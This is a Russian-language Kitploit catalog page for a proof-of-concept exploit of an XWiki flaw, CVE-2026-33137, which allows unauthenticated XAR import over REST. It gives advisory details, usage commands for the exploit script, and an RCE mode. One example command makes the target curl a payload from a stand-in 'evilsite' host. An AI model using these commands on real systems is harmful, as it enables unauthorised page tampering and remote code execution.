Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-33137 — XWiki Platform - CVE-2026-33137 PoC - Unauthenticated XAR Import via REST /wikis/{wikiName} | Kitploit
Инструменты/GitHubGitHub/portbuster1337/cve-2026-33137
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubportbuster1337/cve-2026-33137

CVE-2026-33137

XWiki Platform - CVE-2026-33137 PoC - Unauthenticated XAR Import via REST /wikis/{wikiName}

Репозиторий
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-33137

XWiki Platform - Неаутентифицированный импорт XAR через REST /wikis/{wikiName}

Описание

Конечная точка REST API POST /wikis/{wikiName} в XWiki Platform выполняет импорт XAR (XWiki Archive) без выполнения каких-либо проверок аутентификации или авторизации. Неаутентифицированный злоумышленник может создавать или обновлять произвольные документы в целевой вики, отправляя специально сформированный XAR-файл.

  • CVE: CVE-2026-33137
  • CWE: CWE-862 Отсутствие авторизации
  • CVSS 4.0: 9.3 (Критический) - AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • Опубликовано: 2026-05-20

Затронутые версии

СтатусВерсии
Уязвимые> 15.10.16, > 16.4.6, > 16.10.2
Исправленные16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1

Влияние

Неаутентифицированный злоумышленник может:

  • Создавать произвольные вики-страницы с произвольным содержимым
  • Перезаписывать существующие вики-страницы
  • Потенциально достигать RCE, создавая страницы с вредоносными Velocity/Groovy-скриптами (если скриптинг включён)

Детали

REST-эндпоинт POST /xwiki/rest/wikis/{wikiName} принимает XAR-файл в теле запроса и импортирует его напрямую в вики, не проверяя, есть ли у запрашивающего права ADMIN. Исправление (коммит 4b7b95b) добавляет проверку авторизации с помощью ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...).

Использование PoC

root@kitploit:~
# Install requirements
pip install requests

# Basic usage
python poc.py -t http://target:8080

# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage

# Probe the target first
python poc.py -t http://target:8080 --probe

# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080

# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"

# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"

# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass

Режим RCE (--rce)

Флаг --rce импортирует страницы, содержащие Groovy и Velocity-пейлоады, которые выполняют указанную командную строку. Он автоматически:

  1. Выполняет предварительную проверку (определение версии, статус уязвимости, тест XAR-эндпоинта, доступность триггерных путей)
  2. Импортирует страницы с заданной пользователем командой, встроенной в макросы {{groovy}} и {{velocity}}
  3. Пытается выполнить рендеринг через REST API, веб-интерфейс и инъекцию в стиле SSTI
  4. Сообщает, какие триггерные пути доступны, а какие заблокированы

Требования для успешного RCE:

  • Целевая система должна разрешать гостевой просмотр страниц (или необходимо указать учётные данные через -u / --password)
  • Для просматривающего пользователя должны быть включены права на скриптинг/программирование
  • Триггерные пути не должны блокироваться перенаправлениями на аутентификацию

Как работает эксплойт

  1. Формируется минимальный XAR (ZIP) файл, содержащий:
    • package.xml - описание пакета
    • {Space}/{Page}.xml - XML-документ с содержимым
  2. Байты XAR отправляются методом POST на уязвимый эндпоинт
  3. Если система уязвима, документ создаётся без аутентификации
  4. При необходимости выполняется проверка путём чтения метаданных документа

Отказ от ответственности

Этот PoC предоставлен исключительно в образовательных целях и для авторизованного тестирования безопасности. Несанкционированное использование этого эксплойта против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным программным обеспечением.

Ссылки

  • GitHub Security Advisory GHSA-qrvh-r3f2-9h4r
  • Коммит 4b7b95b (исправление)
  • JIRA XWIKI-23953
  • Запись NVD
Скачать инструмент